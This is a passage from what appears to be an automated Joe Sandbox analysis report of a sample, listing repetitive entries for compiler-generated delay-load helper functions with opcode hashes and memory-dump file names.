String ID:
API String ID: 1269201914-0
Opcode ID: e223f659d277598c312119c87e9eeec2576e048a25d0f9ff364aeb88682f8397
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: e223f659d277598c312119c87e9eeec2576e048a25d0f9ff364aeb88682f8397
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b8b19c215b7b33560408237aabcad097188c10a3bf9c4e4740ff06a62c62659d
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: b8b19c215b7b33560408237aabcad097188c10a3bf9c4e4740ff06a62c62659d
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c63d5ef367a8c3fc23a97aefe6de84cc4109dc82d143b36b034d3220151b84c
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 2c63d5ef367a8c3fc23a97aefe6de84cc4109dc82d143b36b034d3220151b84c
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1215f3da617db43b7a90f6c70259259ac7c74dbd6dcc506384594093a4d881b1
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 1215f3da617db43b7a90f6c70259259ac7c74dbd6dcc506384594093a4d881b1
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66b7d54c019fb4b9c304a04e28e77e1e94bc82eb5513402828dbe6c25e874cdd
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 66b7d54c019fb4b9c304a04e28e77e1e94bc82eb5513402828dbe6c25e874cdd
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 099d3916e076372c777796e1aebb4a9b2dc9d069e29f5fa6e9766be64f061793
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 099d3916e076372c777796e1aebb4a9b2dc9d069e29f5fa6e9766be64f061793
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 36c6aa8d604fdeeeba1af2f68c8b535179dd5fc898a4d3e99df5715cb726c9b0
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 36c6aa8d604fdeeeba1af2f68c8b535179dd5fc898a4d3e99df5715cb726c9b0
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63c5bb8800afeba0725423b3f057ba9e5a5c537d79643c81a58eeb1cd1157e04
Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
Opcode Fuzzy Hash: 63c5bb8800afeba0725423b3f057ba9e5a5c537d79643c81a58eeb1cd1157e04
Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832

Function 0081DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ee5e133d322fbd84edf5ae66f179dee3268813cf6df4120295c481fd8f1bc35
Instruction ID: 9d62a8b38705bb3adfedf8f3db663c6c565b7e7818a0c4798457afda1c4df8b3
Opcode Fuzzy Hash: 0ee5e133d322fbd84edf5ae66f179dee3268813cf6df4120295c481fd8f1bc35
Instruction Fuzzy Hash: 1CA011E22AC2023C3008B202AC22EBB030CFCC0B22330820AB00BE0088A888088A0832

Function 0081DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a0165cbb5d3a4de453400d5f36cd719a76326ec920bea12a14bf4a6da9ca2e8a
Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
Opcode Fuzzy Hash: a0165cbb5d3a4de453400d5f36cd719a76326ec920bea12a14bf4a6da9ca2e8a
Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431

Function 0081DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 52bfeb4c495bf5f65c3268a19d9bbeebb7c22bf0dc8204dac7dd5a767420bc09
Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
Opcode Fuzzy Hash: 52bfeb4c495bf5f65c3268a19d9bbeebb7c22bf0dc8204dac7dd5a767420bc09
Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431

Function 0081DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b5557b971153d8ffbf91406c9bc8f338b72fdf27cceabf0a27f47a2741230f01
Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
Opcode Fuzzy Hash: b5557b971153d8ffbf91406c9bc8f338b72fdf27cceabf0a27f47a2741230f01
Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431

Function 0081DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e42b1ca304d44bf8a8fd7f4ba68aa7a738a740a6a9f6c4d51af8c11ef72594b3
Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
Opcode Fuzzy Hash: e42b1ca304d44bf8a8fd7f4ba68aa7a738a740a6a9f6c4d51af8c11ef72594b3
Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431

Function 0081DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a4f28fa1e4940f69175730398f95fb7f8c643df0c0b4770cc1ae0523a3fc8d2
Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
Opcode Fuzzy Hash: 8a4f28fa1e4940f69175730398f95fb7f8c643df0c0b4770cc1ae0523a3fc8d2
Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431

Function 0081DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7db20307ec2640d0a06d8dc8ddb857fc391fa6cd441f003f12532e921ff22a51
Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
Opcode Fuzzy Hash: 7db20307ec2640d0a06d8dc8ddb857fc391fa6cd441f003f12532e921ff22a51
Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032

Function 0081DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aab982495af112fecce1bc3f266c5b91910e2298dfd6bf27ace2e9005aa814c2
Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
Opcode Fuzzy Hash: aab982495af112fecce1bc3f266c5b91910e2298dfd6bf27ace2e9005aa814c2
Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032

Function 0081DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fda897ef53cbf6c253b58a8a926551b7d99e08766bc42d69a38821c7110ecb1
Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
Opcode Fuzzy Hash: 0fda897ef53cbf6c253b58a8a926551b7d99e08766bc42d69a38821c7110ecb1
Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032

Function 0081DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
